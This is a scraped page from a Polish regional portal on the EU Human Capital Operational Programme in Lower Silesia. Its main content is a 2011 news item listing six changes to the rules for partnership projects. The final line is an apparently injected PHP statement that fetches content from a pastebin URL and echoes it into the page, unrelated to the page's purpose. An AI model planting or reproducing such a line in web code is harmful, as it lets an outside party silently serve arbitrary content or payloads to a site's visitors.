Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

28.12.2011 Nowa wersja Zakresu realizacji projektów partnerskich określonego przez Instytucję Zarządzającą Programem Kapitał Ludzki

Informujemy, że dnia 20 grudnia 2011 r. zatwierdzona została znowelizowana wersja Zakresu realizacji projektów partnerskich określonego przez Instytucję Zarządzającą Programem Kapitał Ludzki. Zapisy nowej wersji Zakresu realizacji projektów partnerskich będą obowiązywać od 1 stycznia 2012 roku.

Najważniejsze zmiany wprowadzone w dokumencie obejmują:

  1. Podkreślenie, że zgodnie z Zasadami finansowania Programu Kapitał Ludzki (PO KL) idea partnerstwa nie dopuszcza możliwości zlecania świadczenia usług, czy zakupu towarów pomiędzy beneficjentem (liderem) a partnerami, w tym także angażowania pracowników/współpracowników partnerów przez beneficjenta (lidera).
  2. Doprecyzowanie zapisów dotyczących składu powoływanej w ramach projektu partnerskiego realizowanego w trybie systemowym Grupy Sterującej (zgodnie z zapisami wprowadzonymi w Zasadach dokonywania wyboru projektów w ramach PO KL).
  3. Doprecyzowanie zapisów stanowiących, że partnerstwa w rozumieniu dokumentu nie stanowi ukonstytuowany już podmiot zrzeszający instytucjonalnie organizacje i instytucje, taki jak np. związek stowarzyszeń lub stowarzyszenie – lokalna grupa działania.
  4. Doprecyzowanie katalogu sytuacji, w których nie może zostać zawarte partnerstwo z powodu powiązań istniejących między podmiotami, które mają wejść w skład potencjalnego partnerstwa.
  5. Podkreślenie, że złożenie wniosku o dofinansowanie projektu w partnerstwie nie oznacza, że w momencie złożenia wniosku między liderem a jego partnerami musi być zawarta umowa partnerska (umowa musi być zawarta najpóźniej przed podpisaniem umowy o dofinansowanie).
  6. Doprecyzowanie zapisów minimalnego zakresu umowy partnerskiej wynikające z uwzględnienia uwag zgłoszonych w ramach konsultacji społecznych dokumentu.


Zakres realizacji projektów partnerskich  Dokument do pobrania


<- Wstecz do: Aktualności

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");